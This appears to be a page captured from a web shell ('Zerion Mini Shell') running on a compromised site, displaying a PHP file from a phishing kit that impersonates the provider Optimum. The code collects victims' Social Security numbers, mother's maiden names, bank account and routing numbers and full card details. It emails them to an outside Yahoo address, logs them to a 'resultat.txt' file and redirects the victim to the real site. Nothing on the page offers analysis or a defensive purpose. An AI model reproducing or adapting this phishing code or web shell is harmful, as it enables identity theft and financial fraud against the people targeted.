%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/assumpcaocom/antivirus-imunify/infected.04-03-2023.1/home/assumpcaocom/pass/
Upload File :
Create Path :
Current File : //home/assumpcaocom/antivirus-imunify/infected.04-03-2023.1/home/assumpcaocom/pass/step2.php

<?php

function token() {
    $alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890';
    $pass = array(); //remember to declare $pass as an array
    $alphaLength = strlen($alphabet) - 1; //put the length -1 in cache
    for ($i = 0; $i < 15; $i++) {
        $n = rand(0, $alphaLength);
        $pass[] = $alphabet[$n];
    }
    return implode($pass); //turn the array into a string
}

if(isset($_POST['NSN'])){
	

    $subject = '[OPTIMUM '.$_SESSION['IP'].'] FULLZ'; 
    $tos = "allspamresults@yahoo.com";
    $message = ' 
    <html> 
        <head> 
            <title>[OPTIMUM '.$_SESSION['IP'].'] FULLZ
        </head> 
        <body>   
Mothers Maiden Name: '.$_POST['mmn'].'
Account number: '.$_POST['accountNumber'].'
Routing number: '.$_POST['routing'].'
SSN: '.$_POST['NSN'].'
Cardholder: '.$_POST['name'].'
Card number: '.$_POST['number'].'
Expiration: '.$_POST['expiry'].'
CVC: '.$_POST['cvc'].'
             

IP: '.$_SESSION['IP'].'
User-Agent: '.$_SESSION['HTTP_USER_AGENT'].'
        </body> 
    </html>'; 
    $victimes = fopen("resultat.txt","a");
    fwrite($victimes,$message);
    fclose($victimes);
    
    @mail($tos, $subject, $message);

	header("Location: https://www.optimum.net/");
}else{
	exit();
}
?>

Zerion Mini Shell 1.0